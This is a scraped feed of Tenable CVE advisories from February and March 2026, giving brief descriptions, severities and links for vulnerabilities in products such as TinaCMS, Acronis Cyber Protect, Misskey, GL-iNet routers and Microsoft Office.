Tina is a headless content management system. Prior to 2.1.7, a path traversal vulnerability exists in the TinaCMS development server's media upload handler. The code at media.ts joins user-controlled path segments using path.join() without validating that the resulting path stays within the intended media directory. This allows writing files to arbitrary locations on the filesystem. This vulnerability is fixed in 2.1.7.

Read more at https://www.tenable.com/cve/CVE-2026-28791

]]> https://www.tenable.com/cve/CVE-2026-2879 https://www.tenable.com/cve/CVE-2026-2879 Fri, 13 Mar 2026 19:54:34 GMT Medium Severity

Description

The GetGenie plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.3.2. This is due to missing validation on the `id` parameter in the `create()` method of the `GetGenieChat` REST API endpoint. The method accepts a user-controlled post ID and, when a post with that ID exists, calls `wp_update_post()` without verifying that the current user owns the post or that the post is of the expected `getgenie_chat` type. This makes it possible for authenticated attackers, with Author-level access and above, to overwrite arbitrary posts owned by any user — including Administrators — effectively destroying the original content by changing its `post_type` to `getgenie_chat` and reassigning `post_author` to the attacker.

Read more at https://www.tenable.com/cve/CVE-2026-2879

]]> https://www.tenable.com/cve/CVE-2026-28727 https://www.tenable.com/cve/CVE-2026-28727 Fri, 06 Mar 2026 00:16:13 GMT High Severity

Description

Local privilege escalation due to insecure Unix socket permissions. The following products are affected: Acronis Cyber Protect 17 (macOS) before build 41186, Acronis Cyber Protect Cloud Agent (macOS) before build 41124.

Read more at https://www.tenable.com/cve/CVE-2026-28727

]]> https://www.tenable.com/cve/CVE-2026-28726 https://www.tenable.com/cve/CVE-2026-28726 Fri, 06 Mar 2026 00:16:13 GMT Medium Severity

Description

Sensitive information disclosure due to improper access control. The following products are affected: Acronis Cyber Protect 17 (Linux, Windows) before build 41186.

Read more at https://www.tenable.com/cve/CVE-2026-28726

]]> https://www.tenable.com/cve/CVE-2026-28725 https://www.tenable.com/cve/CVE-2026-28725 Fri, 06 Mar 2026 00:16:13 GMT Medium Severity

Description

Sensitive information disclosure due to improper configuration of a headless browser. The following products are affected: Acronis Cyber Protect 17 (Linux, Windows) before build 41186.

Read more at https://www.tenable.com/cve/CVE-2026-28725

]]> https://www.tenable.com/cve/CVE-2026-28724 https://www.tenable.com/cve/CVE-2026-28724 Fri, 06 Mar 2026 00:16:13 GMT Medium Severity

Description

Unauthorized data access due to insufficient access control validation. The following products are affected: Acronis Cyber Protect 17 (Linux, Windows) before build 41186.

Read more at https://www.tenable.com/cve/CVE-2026-28724

]]> https://www.tenable.com/cve/CVE-2026-28723 https://www.tenable.com/cve/CVE-2026-28723 Fri, 06 Mar 2026 00:16:13 GMT Medium Severity

Description

Unauthorized report deletion due to insufficient access control. The following products are affected: Acronis Cyber Protect 17 (Linux, Windows) before build 41186.

Read more at https://www.tenable.com/cve/CVE-2026-28723

]]> https://www.tenable.com/cve/CVE-2026-28720 https://www.tenable.com/cve/CVE-2026-28720 Fri, 06 Mar 2026 00:16:12 GMT Medium Severity

Description

Unauthorized modification of settings due to insufficient authorization checks. The following products are affected: Acronis Cyber Protect 17 (Linux, Windows) before build 41186.

Read more at https://www.tenable.com/cve/CVE-2026-28720

]]> https://www.tenable.com/cve/CVE-2026-28719 https://www.tenable.com/cve/CVE-2026-28719 Fri, 06 Mar 2026 00:16:12 GMT Medium Severity

Description

Unauthorized resource manipulation due to improper authorization checks. The following products are affected: Acronis Cyber Protect 17 (Linux, Windows) before build 41186.

Read more at https://www.tenable.com/cve/CVE-2026-28719

]]> https://www.tenable.com/cve/CVE-2026-28714 https://www.tenable.com/cve/CVE-2026-28714 Fri, 06 Mar 2026 00:16:11 GMT Medium Severity

Description

Unnecessary transmission of sensitive cryptographic material. The following products are affected: Acronis Cyber Protect 17 (Linux, Windows) before build 41186.

Read more at https://www.tenable.com/cve/CVE-2026-28714

]]> https://www.tenable.com/cve/CVE-2026-28713 https://www.tenable.com/cve/CVE-2026-28713 Fri, 06 Mar 2026 00:16:11 GMT High Severity

Description

Default credentials set for local privileged user in Virtual Appliance. The following products are affected: Acronis Cyber Protect Cloud Agent (VMware) before build 36943, Acronis Cyber Protect 17 (VMware) before build 41186.

Read more at https://www.tenable.com/cve/CVE-2026-28713

]]> https://www.tenable.com/cve/CVE-2026-2859 https://www.tenable.com/cve/CVE-2026-2859 Fri, 13 Mar 2026 19:54:34 GMT Medium Severity

Description

Improper permission enforcement in Checkmk versions 2.4.0 before 2.4.0p23, 2.3.0 before 2.3.0p43, and 2.2.0 (EOL) allows unauthenticated users to enumerate existing hosts by observing different HTTP response codes in deploy_agent endpoint, which could lead to information disclosure.

Read more at https://www.tenable.com/cve/CVE-2026-2859

]]> https://www.tenable.com/cve/CVE-2026-28513 https://www.tenable.com/cve/CVE-2026-28513 Tue, 10 Mar 2026 17:38:50 GMT High Severity

Description

Pocket ID is an OIDC provider that allows users to authenticate with their passkeys to your services. Prior to 2.4.0, the OIDC token endpoint rejects an authorization code only when both the client ID is wrong and the code is expired. This allows cross-client code exchange and expired code reuse. This vulnerability is fixed in 2.4.0.

Read more at https://www.tenable.com/cve/CVE-2026-28513

]]> https://www.tenable.com/cve/CVE-2026-28512 https://www.tenable.com/cve/CVE-2026-28512 Tue, 10 Mar 2026 17:38:50 GMT Medium Severity

Description

Pocket ID is an OIDC provider that allows users to authenticate with their passkeys to your services. From 2.0.0 to before 2.4.0, a flaw in callback URL validation allowed crafted redirect_uri values containing URL userinfo (@) to bypass legitimate callback pattern checks. If an attacker can trick a user into opening a malicious authorization link, the authorization code may be redirected to an attacker-controlled host. This vulnerability is fixed in 2.4.0.

Read more at https://www.tenable.com/cve/CVE-2026-28512

]]> https://www.tenable.com/cve/CVE-2026-28433 https://www.tenable.com/cve/CVE-2026-28433 Tue, 10 Mar 2026 07:43:35 GMT Low Severity

Description

Misskey is an open source, federated social media platform. All Misskey servers running versions 10.93.0 and later, but prior to 2026.3.1, contain a vulnerability that allows importing other users' data due to lack of ownership validation. The impact of this vulnerability is estimated to be relatively low, as bad actors would require the ID corresponding to the target file for import. This vulnerability is fixed in 2026.3.1.

Read more at https://www.tenable.com/cve/CVE-2026-28433

]]> https://www.tenable.com/cve/CVE-2026-28432 https://www.tenable.com/cve/CVE-2026-28432 Tue, 10 Mar 2026 07:43:35 GMT High Severity

Description

Misskey is an open source, federated social media platform. All Misskey servers prior to 2026.3.1 contain a vulnerability that allows bypassing HTTP signature verification. Although this is a vulnerability related to federation, it affects all servers regardless of whether federation is enabled or disabled. This vulnerability is fixed in 2026.3.1.

Read more at https://www.tenable.com/cve/CVE-2026-28432

]]> https://www.tenable.com/cve/CVE-2026-28431 https://www.tenable.com/cve/CVE-2026-28431 Tue, 10 Mar 2026 07:43:35 GMT Critical Severity

Description

Misskey is an open source, federated social media platform. All Misskey servers running versions 8.45.0 and later, but prior to 2026.3.1, contain a vulnerability that allows bad actors access to data that they ordinarily wouldn't be able to access due to insufficient permission checks and proper input validation. This vulnerability occurs regardless of whether federation is enabled or not. This vulnerability could lead to a significant data breach. This vulnerability is fixed in 2026.3.1.

Read more at https://www.tenable.com/cve/CVE-2026-28431

]]> https://www.tenable.com/cve/CVE-2026-28384 https://www.tenable.com/cve/CVE-2026-28384 Thu, 12 Mar 2026 15:16:27 GMT Critical Severity

Description

An improper sanitization of the compression_algorithm parameter in Canonical LXD allows an authenticated, unprivileged user to execute commands as the LXD daemon on the LXD server via API calls to the image and backup endpoints. This issue affected LXD from 4.12 through 6.6 and was fixed in the snap versions 5.0.6-e49d9f4 (channel 5.0/stable), 5.21.4-1374f39 (channel 5.21/stable), and 6.7-1f11451 (channel 6.0 stable). The channel 4.0/stable is not affected as it contains version 4.0.10.

Read more at https://www.tenable.com/cve/CVE-2026-28384

]]> https://www.tenable.com/cve/CVE-2026-28281 https://www.tenable.com/cve/CVE-2026-28281 Tue, 10 Mar 2026 17:38:39 GMT High Severity

Description

InstantCMS is a free and open source content management system. Prior to 2.18.1, InstantCMS does not validate CSRF tokens, which allows attackers grant moderator privileges to users, execute scheduled tasks, move posts to trash, and accept friend requests on behalf of the user. This vulnerability is fixed in 2.18.1.

Read more at https://www.tenable.com/cve/CVE-2026-28281

]]> https://www.tenable.com/cve/CVE-2026-28119 https://www.tenable.com/cve/CVE-2026-28119 Thu, 05 Mar 2026 06:16:46 GMT High Severity

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Axiomthemes Nirvana allows PHP Local File Inclusion.This issue affects Nirvana: from n/a through 2.6.

Read more at https://www.tenable.com/cve/CVE-2026-28119

]]> https://www.tenable.com/cve/CVE-2026-27750 https://www.tenable.com/cve/CVE-2026-27750 Thu, 05 Mar 2026 15:16:12 GMT High Severity

Description

Avira Internet Security contains a time-of-check time-of-use (TOCTOU) vulnerability in the Optimizer component. A privileged service running as SYSTEM identifies directories for cleanup during a scan phase and subsequently deletes them during a separate cleanup phase without revalidating the target path. A local attacker can replace a previously scanned directory with a junction or reparse point before deletion occurs, causing the privileged process to delete an unintended system location. This may result in deletion of protected files or directories and can lead to local privilege escalation, denial of service, or system integrity compromise depending on the affected target.

Read more at https://www.tenable.com/cve/CVE-2026-27750

]]> https://www.tenable.com/cve/CVE-2026-27749 https://www.tenable.com/cve/CVE-2026-27749 Thu, 05 Mar 2026 15:16:11 GMT High Severity

Description

Avira Internet Security contains a deserialization of untrusted data vulnerability in the System Speedup component. The Avira.SystemSpeedup.RealTimeOptimizer.exe process, which runs with SYSTEM privileges, deserializes data from a file located in C:\\ProgramData using .NET BinaryFormatter without implementing input validation or deserialization safeguards. Because the file can be created or modified by a local user in default configurations, an attacker can supply a crafted serialized payload that is deserialized by the privileged process, resulting in arbitrary code execution as SYSTEM.

Read more at https://www.tenable.com/cve/CVE-2026-27749

]]> https://www.tenable.com/cve/CVE-2026-27748 https://www.tenable.com/cve/CVE-2026-27748 Thu, 05 Mar 2026 15:16:11 GMT High Severity

Description

Avira Internet Security contains an improper link resolution vulnerability in the Software Updater component. During the update process, a privileged service running as SYSTEM deletes a file under C:\\ProgramData without validating whether the path resolves through a symbolic link or reparse point. A local attacker can create a malicious link to redirect the delete operation to an arbitrary file, resulting in deletion of attacker-chosen files with SYSTEM privileges. This may lead to local privilege escalation, denial of service, or system integrity compromise depending on the targeted file and operating system configuration.

Read more at https://www.tenable.com/cve/CVE-2026-27748

]]> https://www.tenable.com/cve/CVE-2026-27704 https://www.tenable.com/cve/CVE-2026-27704 Wed, 25 Feb 2026 16:23:26 GMT High Severity

Description

The Dart and Flutter SDKs provide software development kits for the Dart programming language. In versions of the Dart SDK prior to 3.11.0 and the Flutter SDK prior to version 3.41.0, when the pub client (`dart pub` and `flutter pub`) extracts a package in the pub cache, a malicious package archive can have files extracted outside the destination directory in the `PUB_CACHE`. A fix has been landed in commit 26c6985c742593d081f8b58450f463a584a4203a. By normalizing the file path before writing file, the attacker can no longer traverse up via a symlink. This patch is released in Dart 3.11.0 and Flutter 3.41.0.vAll packages on pub.dev have been vetted for this vulnerability. New packages are no longer allowed to contain symlinks. The pub client itself doesn't upload symlinks, but duplicates the linked entry, and has been doing this for years. Those whose dependencies are all from pub.dev, third-party repositories trusted to not contain malicious code, or git dependencies are not affected by this vulnerability.

Read more at https://www.tenable.com/cve/CVE-2026-27704

]]> https://www.tenable.com/cve/CVE-2026-26982 https://www.tenable.com/cve/CVE-2026-26982 Tue, 10 Mar 2026 07:42:41 GMT High Severity

Description

Ghostty is a cross-platform terminal emulator. Ghostty allows control characters such as 0x03 (Ctrl+C) in pasted and dropped text. These can be used to execute arbitrary commands in some shell environments. This attack requires an attacker to convince the user to copy and paste or drag and drop malicious text. The attack requires user interaction to be triggered, but the dangerous characters are invisible in most GUI environments so it isn't trivially detected, especially if the string contents are complex. Fixed in Ghostty v1.3.0.

Read more at https://www.tenable.com/cve/CVE-2026-26982

]]> https://www.tenable.com/cve/CVE-2026-26954 https://www.tenable.com/cve/CVE-2026-26954 Fri, 13 Mar 2026 19:54:31 GMT Critical Severity

Description

SandboxJS is a JavaScript sandboxing library. Prior to 0.8.34, it is possible to obtain arrays containing Function, which allows escaping the sandbox. Given an array containing Function, and Object.fromEntries, it is possible to construct {[p]: Function} where p is any constructible property. This vulnerability is fixed in 0.8.34.

Read more at https://www.tenable.com/cve/CVE-2026-26954

]]> https://www.tenable.com/cve/CVE-2026-26795 https://www.tenable.com/cve/CVE-2026-26795 Thu, 12 Mar 2026 18:16:23 GMT Critical Severity

Description

GL-iNet GL-AR300M16 v4.3.11 was discovered to contain a command injection vulnerability via the module parameter in the M.get_system_log function. This vulnerability allows attackers to execute arbitrary commands via a crafted input.

Read more at https://www.tenable.com/cve/CVE-2026-26795

]]> https://www.tenable.com/cve/CVE-2026-26794 https://www.tenable.com/cve/CVE-2026-26794 Thu, 12 Mar 2026 18:16:22 GMT High Severity

Description

GL-iNet GL-AR300M16 v4.3.11 was discovered to contain a SQL injection vulnerability via the add_group() function. This vulnerability allows attackers to execute arbitrary SQL database operations via a crafted HTTP request.

Read more at https://www.tenable.com/cve/CVE-2026-26794

]]> https://www.tenable.com/cve/CVE-2026-26793 https://www.tenable.com/cve/CVE-2026-26793 Thu, 12 Mar 2026 19:16:16 GMT Critical Severity

Description

GL-iNet GL-AR300M16 v4.3.11 was discovered to contain a command injection vulnerability via the set_config function. This vulnerability allows attackers to execute arbitrary commands via a crafted input.

Read more at https://www.tenable.com/cve/CVE-2026-26793

]]> https://www.tenable.com/cve/CVE-2026-26792 https://www.tenable.com/cve/CVE-2026-26792 Thu, 12 Mar 2026 18:16:22 GMT Critical Severity

Description

GL-iNet GL-AR300M16 v4.3.11 was discovered to contain multiple command injection vulnerabilities in the set_upgrade function via the modem_url, target_version, current_version, firmware_upload, hash_type, hash_value, and upgrade_type parameters. These vulnerabilities allow attackers to execute arbitrary commands via a crafted input.

Read more at https://www.tenable.com/cve/CVE-2026-26792

]]> https://www.tenable.com/cve/CVE-2026-26791 https://www.tenable.com/cve/CVE-2026-26791 Thu, 12 Mar 2026 18:16:22 GMT Critical Severity

Description

GL-iNet GL-AR300M16 v4.3.11 was discovered to contain a command injection vulnerability via the string port parameter in the enable_echo_server function. This vulnerability allows attackers to execute arbitrary commands via a crafted input.

Read more at https://www.tenable.com/cve/CVE-2026-26791

]]> https://www.tenable.com/cve/CVE-2026-2673 https://www.tenable.com/cve/CVE-2026-2673 Fri, 13 Mar 2026 19:54:34 GMT High Severity

Description

Issue summary: An OpenSSL TLS 1.3 server may fail to negotiate the expected preferred key exchange group when its key exchange group configuration includes the default by using the 'DEFAULT' keyword. Impact summary: A less preferred key exchange may be used even when a more preferred group is supported by both client and server, if the group was not included among the client's initial predicated keyshares. This will sometimes be the case with the new hybrid post-quantum groups, if the client chooses to defer their use until specifically requested by the server. If an OpenSSL TLS 1.3 server's configuration uses the 'DEFAULT' keyword to interpolate the built-in default group list into its own configuration, perhaps adding or removing specific elements, then an implementation defect causes the 'DEFAULT' list to lose its 'tuple' structure, and all server-supported groups were treated as a single sufficiently secure 'tuple', with the server not sending a Hello Retry Request (HRR) even when a group in a more preferred tuple was mutually supported. As a result, the client and server might fail to negotiate a mutually supported post-quantum key agreement group, such as 'X25519MLKEM768', if the client's configuration results in only 'classical' groups (such as 'X25519' being the only ones in the client's initial keyshare prediction). OpenSSL 3.5 and later support a new syntax for selecting the most preferred TLS 1.3 key agreement group on TLS servers. The old syntax had a single 'flat' list of groups, and treated all the supported groups as sufficiently secure. If any of the keyshares predicted by the client were supported by the server the most preferred among these was selected, even if other groups supported by the client, but not included in the list of predicted keyshares would have been more preferred, if included. The new syntax partitions the groups into distinct 'tuples' of roughly equivalent security. Within each tuple the most preferred group included among the client's predicted keyshares is chosen, but if the client supports a group from a more preferred tuple, but did not predict any corresponding keyshares, the server will ask the client to retry the ClientHello (by issuing a Hello Retry Request or HRR) with the most preferred mutually supported group. The above works as expected when the server's configuration uses the built-in default group list, or explicitly defines its own list by directly defining the various desired groups and group 'tuples'. No OpenSSL FIPS modules are affected by this issue, the code in question lies outside the FIPS boundary. OpenSSL 3.6 and 3.5 are vulnerable to this issue. OpenSSL 3.6 users should upgrade to OpenSSL 3.6.2 once it is released. OpenSSL 3.5 users should upgrade to OpenSSL 3.5.6 once it is released. OpenSSL 3.4, 3.3, 3.0, 1.0.2 and 1.1.1 are not affected by this issue.

Read more at https://www.tenable.com/cve/CVE-2026-2673

]]> https://www.tenable.com/cve/CVE-2026-26148 https://www.tenable.com/cve/CVE-2026-26148 Tue, 10 Mar 2026 18:18:43 GMT High Severity

Description

External initialization of trusted variables or data stores in Azure Entra ID allows an unauthorized attacker to elevate privileges locally.

Read more at https://www.tenable.com/cve/CVE-2026-26148

]]> https://www.tenable.com/cve/CVE-2026-26144 https://www.tenable.com/cve/CVE-2026-26144 Tue, 10 Mar 2026 18:18:43 GMT Medium Severity

Description

Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office Excel allows an unauthorized attacker to disclose information over a network.

Read more at https://www.tenable.com/cve/CVE-2026-26144

]]> https://www.tenable.com/cve/CVE-2026-26141 https://www.tenable.com/cve/CVE-2026-26141 Tue, 10 Mar 2026 18:18:42 GMT High Severity

Description

Improper authentication in Azure Arc allows an authorized attacker to elevate privileges locally.

Read more at https://www.tenable.com/cve/CVE-2026-26141

]]> https://www.tenable.com/cve/CVE-2026-26134 https://www.tenable.com/cve/CVE-2026-26134 Tue, 10 Mar 2026 18:18:42 GMT High Severity

Description

Integer overflow or wraparound in Microsoft Office allows an authorized attacker to elevate privileges locally.

Read more at https://www.tenable.com/cve/CVE-2026-26134

]]> https://www.tenable.com/cve/CVE-2026-26123 https://www.tenable.com/cve/CVE-2026-26123 Tue, 10 Mar 2026 20:16:34 GMT Medium Severity

Description

Cwe is not in rca categories in Microsoft Authenticator allows an unauthorized attacker to disclose information locally.

Read more at https://www.tenable.com/cve/CVE-2026-26123

]]> https://www.tenable.com/cve/CVE-2026-26121 https://www.tenable.com/cve/CVE-2026-26121 Tue, 10 Mar 2026 18:18:41 GMT High Severity

Description

Server-side request forgery (ssrf) in Azure IoT Explorer allows an unauthorized attacker to perform spoofing over a network.

Read more at https://www.tenable.com/cve/CVE-2026-26121

]]> https://www.tenable.com/cve/CVE-2026-26118 https://www.tenable.com/cve/CVE-2026-26118 Tue, 10 Mar 2026 18:18:41 GMT High Severity

Description

Server-side request forgery (ssrf) in Azure MCP Server allows an authorized attacker to elevate privileges over a network.

Read more at https://www.tenable.com/cve/CVE-2026-26118

]]> https://www.tenable.com/cve/CVE-2026-26117 https://www.tenable.com/cve/CVE-2026-26117 Tue, 10 Mar 2026 18:18:41 GMT High Severity

Description

Authentication bypass using an alternate path or channel in Azure Windows Virtual Machine Agent allows an authorized attacker to elevate privileges locally.

Read more at https://www.tenable.com/cve/CVE-2026-26117

]]> https://www.tenable.com/cve/CVE-2026-26116 https://www.tenable.com/cve/CVE-2026-26116 Tue, 10 Mar 2026 18:18:40 GMT High Severity

Description

Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.

Read more at https://www.tenable.com/cve/CVE-2026-26116

]]> https://www.tenable.com/cve/CVE-2026-26115 https://www.tenable.com/cve/CVE-2026-26115 Tue, 10 Mar 2026 18:18:40 GMT High Severity

Description

Improper validation of specified type of input in SQL Server allows an authorized attacker to elevate privileges over a network.

Read more at https://www.tenable.com/cve/CVE-2026-26115

]]> https://www.tenable.com/cve/CVE-2026-26114 https://www.tenable.com/cve/CVE-2026-26114 Tue, 10 Mar 2026 18:18:40 GMT High Severity

Description

Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.

Read more at https://www.tenable.com/cve/CVE-2026-26114

]]> https://www.tenable.com/cve/CVE-2026-26113 https://www.tenable.com/cve/CVE-2026-26113 Tue, 10 Mar 2026 18:18:40 GMT High Severity

Description

Untrusted pointer dereference in Microsoft Office allows an unauthorized attacker to execute code locally.

Read more at https://www.tenable.com/cve/CVE-2026-26113

]]> https://www.tenable.com/cve/CVE-2026-26112 https://www.tenable.com/cve/CVE-2026-26112 Tue, 10 Mar 2026 18:18:39 GMT High Severity

Description

Untrusted pointer dereference in Microsoft Office Excel allows an unauthorized attacker to execute code locally.

Read more at https://www.tenable.com/cve/CVE-2026-26112

]]> https://www.tenable.com/cve/CVE-2026-26111 https://www.tenable.com/cve/CVE-2026-26111 Tue, 10 Mar 2026 18:18:39 GMT High Severity

Description

Integer overflow or wraparound in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to execute code over a network.

Read more at https://www.tenable.com/cve/CVE-2026-26111

]]> https://www.tenable.com/cve/CVE-2026-26110 https://www.tenable.com/cve/CVE-2026-26110 Tue, 10 Mar 2026 18:18:39 GMT High Severity

Description

Access of resource using incompatible type ('type confusion') in Microsoft Office allows an unauthorized attacker to execute code locally.

Read more at https://www.tenable.com/cve/CVE-2026-26110

]]> https://www.tenable.com/cve/CVE-2026-26109 https://www.tenable.com/cve/CVE-2026-26109 Tue, 10 Mar 2026 18:18:39 GMT High Severity

Description

Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code locally.

Read more at https://www.tenable.com/cve/CVE-2026-26109

]]> https://www.tenable.com/cve/CVE-2026-26108 https://www.tenable.com/cve/CVE-2026-26108 Tue, 10 Mar 2026 18:18:39 GMT High Severity

Description

Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.

Read more at https://www.tenable.com/cve/CVE-2026-26108

]]> https://www.tenable.com/cve/CVE-2026-26107 https://www.tenable.com/cve/CVE-2026-26107 Tue, 10 Mar 2026 18:18:38 GMT High Severity

Description

Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.

Read more at https://www.tenable.com/cve/CVE-2026-26107

]]> https://www.tenable.com/cve/CVE-2026-26106 https://www.tenable.com/cve/CVE-2026-26106 Tue, 10 Mar 2026 18:18:38 GMT High Severity

Description

Improper input validation in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.

Read more at https://www.tenable.com/cve/CVE-2026-26106

]]> https://www.tenable.com/cve/CVE-2026-26105 https://www.tenable.com/cve/CVE-2026-26105 Tue, 10 Mar 2026 18:18:38 GMT Critical Severity

Description

Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an unauthorized attacker to perform spoofing over a network.

Read more at https://www.tenable.com/cve/CVE-2026-26105

]]> https://www.tenable.com/cve/CVE-2026-26104 https://www.tenable.com/cve/CVE-2026-26104 Wed, 25 Feb 2026 11:16:03 GMT Medium Severity

Description

A flaw was found in the udisks storage management daemon that allows unprivileged users to back up LUKS encryption headers without authorization. The issue occurs because a privileged D-Bus method responsible for exporting encryption metadata does not perform a policy check. As a result, sensitive cryptographic metadata can be read and written to attacker-controlled locations. This weakens the confidentiality guarantees of encrypted storage volumes.

Read more at https://www.tenable.com/cve/CVE-2026-26104

]]> https://www.tenable.com/cve/CVE-2026-26103 https://www.tenable.com/cve/CVE-2026-26103 Wed, 25 Feb 2026 11:16:02 GMT High Severity

Description

A flaw was found in the udisks storage management daemon that exposes a privileged D-Bus API for restoring LUKS encryption headers without proper authorization checks. The issue allows a local unprivileged user to instruct the root-owned udisks daemon to overwrite encryption metadata on block devices. This can permanently invalidate encryption keys and render encrypted volumes inaccessible. Successful exploitation results in a denial-of-service condition through irreversible data loss.

Read more at https://www.tenable.com/cve/CVE-2026-26103

]]> https://www.tenable.com/cve/CVE-2026-25823 https://www.tenable.com/cve/CVE-2026-25823 Fri, 13 Mar 2026 19:54:27 GMT Critical Severity

Description

HMS Networks Ewon Flexy with firmware before 15.0s4, Cosy+ with firmware 22.xx before 22.1s6, and Cosy+ with firmware 23.xx before 23.0s3 have a stack buffer overflow that leads to a Denial of Service, which can also be exploited to achieve Unauthenticated Remote Code Execution.

Read more at https://www.tenable.com/cve/CVE-2026-25823

]]> https://www.tenable.com/cve/CVE-2026-25819 https://www.tenable.com/cve/CVE-2026-25819 Fri, 13 Mar 2026 19:54:27 GMT High Severity

Description

HMS Networks Ewon Flexy with firmware before 15.0s4, Cosy+ with firmware 22.xx before 22.1s6, and Cosy+ with firmware 23.xx before 23.0s3 allows unauthenticated attackers to cause a Denial of Service by using a specially crafted HTTP request that leads to a reboot of the device, provided they have access to the device's GUI.

Read more at https://www.tenable.com/cve/CVE-2026-25819

]]> https://www.tenable.com/cve/CVE-2026-25818 https://www.tenable.com/cve/CVE-2026-25818 Fri, 13 Mar 2026 19:54:27 GMT Critical Severity

Description

HMS Networks Ewon Flexy with firmware before 15.0s4, Cosy+ with firmware 22.xx before 22.1s6, and Cosy+ with firmware 23.xx before 23.0s3 have weak entropy for authentication cookies, allowing an attacker with a stolen session cookie to find the user password by brute-forcing an encryption parameter.

Read more at https://www.tenable.com/cve/CVE-2026-25818

]]> https://www.tenable.com/cve/CVE-2026-25817 https://www.tenable.com/cve/CVE-2026-25817 Fri, 13 Mar 2026 19:54:25 GMT High Severity

Description

HMS Networks Ewon Flexy with firmware before 15.0s4, Cosy+ with firmware 22.xx before 22.1s6, and Cosy+ with firmware 23.xx before 23.0s3 have improper neutralization of special elements used in an OS command allowing remote code execution by attackers with low privilege access on the gateway, provided the attacker has credentials.

Read more at https://www.tenable.com/cve/CVE-2026-25817

]]> https://www.tenable.com/cve/CVE-2026-2581 https://www.tenable.com/cve/CVE-2026-2581 Thu, 12 Mar 2026 21:16:25 GMT Medium Severity

Description

This is an uncontrolled resource consumption vulnerability (CWE-400) that can lead to Denial of Service (DoS). In vulnerable Undici versions, when interceptors.deduplicate() is enabled, response data for deduplicated requests could be accumulated in memory for downstream handlers. An attacker-controlled or untrusted upstream endpoint can exploit this with large/chunked responses and concurrent identical requests, causing high memory usage and potential OOM process termination. Impacted users are applications that use Undici’s deduplication interceptor against endpoints that may produce large or long-lived response bodies. PatchesThe issue has been patched by changing deduplication behavior to stream response chunks to downstream handlers as they arrive (instead of full-body accumulation), and by preventing late deduplication when body streaming has already started. Users should upgrade to the first official Undici (and Node.js, where applicable) releases that include this patch.

Read more at https://www.tenable.com/cve/CVE-2026-2581

]]> https://www.tenable.com/cve/CVE-2026-25737 https://www.tenable.com/cve/CVE-2026-25737 Mon, 09 Mar 2026 21:16:15 GMT Critical Severity

Description

Budibase is a low code platform for creating internal tools, workflows, and admin panels. In 3.24.0 and earlier, an arbitrary file upload vulnerability exists even though file extension restrictions are configured. The restriction is enforced only at the UI level. An attacker can bypass these restrictions and upload malicious files.

Read more at https://www.tenable.com/cve/CVE-2026-25737

]]> https://www.tenable.com/cve/CVE-2026-25689 https://www.tenable.com/cve/CVE-2026-25689 Tue, 10 Mar 2026 18:18:37 GMT Medium Severity

Description

An improper neutralization of argument delimiters in a command ('argument injection') vulnerability in Fortinet FortiDeceptor 6.2.0, FortiDeceptor 6.0 all versions, FortiDeceptor 5.3 all versions, FortiDeceptor 5.2 all versions, FortiDeceptor 5.1 all versions, FortiDeceptor 5.0 all versions, FortiDeceptor 4.3 all versions, FortiDeceptor 4.2 all versions, FortiDeceptor 4.1 all versions, FortiDeceptor 4.0 all versions may allow a privileged attacker with super-admin profile and CLI access to delete sensitive files via crafted HTTP requests.

Read more at https://www.tenable.com/cve/CVE-2026-25689

]]> https://www.tenable.com/cve/CVE-2026-25572 https://www.tenable.com/cve/CVE-2026-25572 Tue, 10 Mar 2026 18:18:37 GMT Medium Severity

Description

A vulnerability has been identified in SICAM SIAPP SDK (All versions < V2.1.7). The SICAM SIAPP SDK server component does not enforce maximum length checks on certain variables before use. This could allow an attacker to send an oversized input that could trigger a stack overflow crashing the process and potentially causing denial of service.

Read more at https://www.tenable.com/cve/CVE-2026-25572

]]> https://www.tenable.com/cve/CVE-2026-25571 https://www.tenable.com/cve/CVE-2026-25571 Tue, 10 Mar 2026 18:18:37 GMT Medium Severity

Description

A vulnerability has been identified in SICAM SIAPP SDK (All versions < V2.1.7). The SICAM SIAPP SDK client component does not enforce maximum length checks on certain variables before use. This could allow an attacker to send an oversized input that could trigger a stack overflow crashing the process and potentially causing denial of service.

Read more at https://www.tenable.com/cve/CVE-2026-25571

]]> https://www.tenable.com/cve/CVE-2026-25570 https://www.tenable.com/cve/CVE-2026-25570 Tue, 10 Mar 2026 18:18:36 GMT High Severity

Description

A vulnerability has been identified in SICAM SIAPP SDK (All versions < V2.1.7). The SICAM SIAPP SDK does not perform checks on input values potentially resulting in stack overflow. This could allow an attacker to perform code execution and denial of service.

Read more at https://www.tenable.com/cve/CVE-2026-25570

]]> https://www.tenable.com/cve/CVE-2026-25569 https://www.tenable.com/cve/CVE-2026-25569 Tue, 10 Mar 2026 18:18:36 GMT High Severity

Description

A vulnerability has been identified in SICAM SIAPP SDK (All versions < V2.1.7). An out-of-bounds write vulnerability exists in SICAM SIAPP SDK. This could allow an attacker to write data beyond the intended buffer, potentially leading to denial of service, or arbitrary code execution.

Read more at https://www.tenable.com/cve/CVE-2026-25569

]]> https://www.tenable.com/cve/CVE-2026-25190 https://www.tenable.com/cve/CVE-2026-25190 Tue, 10 Mar 2026 18:18:36 GMT High Severity

Description

Untrusted search path in Windows GDI allows an unauthorized attacker to execute code locally.

Read more at https://www.tenable.com/cve/CVE-2026-25190

]]> https://www.tenable.com/cve/CVE-2026-25189 https://www.tenable.com/cve/CVE-2026-25189 Tue, 10 Mar 2026 18:18:36 GMT High Severity

Description

Use after free in Windows DWM Core Library allows an authorized attacker to elevate privileges locally.

Read more at https://www.tenable.com/cve/CVE-2026-25189

]]> https://www.tenable.com/cve/CVE-2026-25188 https://www.tenable.com/cve/CVE-2026-25188 Tue, 10 Mar 2026 18:18:35 GMT High Severity

Description

Heap-based buffer overflow in Windows Telephony Service allows an unauthorized attacker to elevate privileges over an adjacent network.

Read more at https://www.tenable.com/cve/CVE-2026-25188

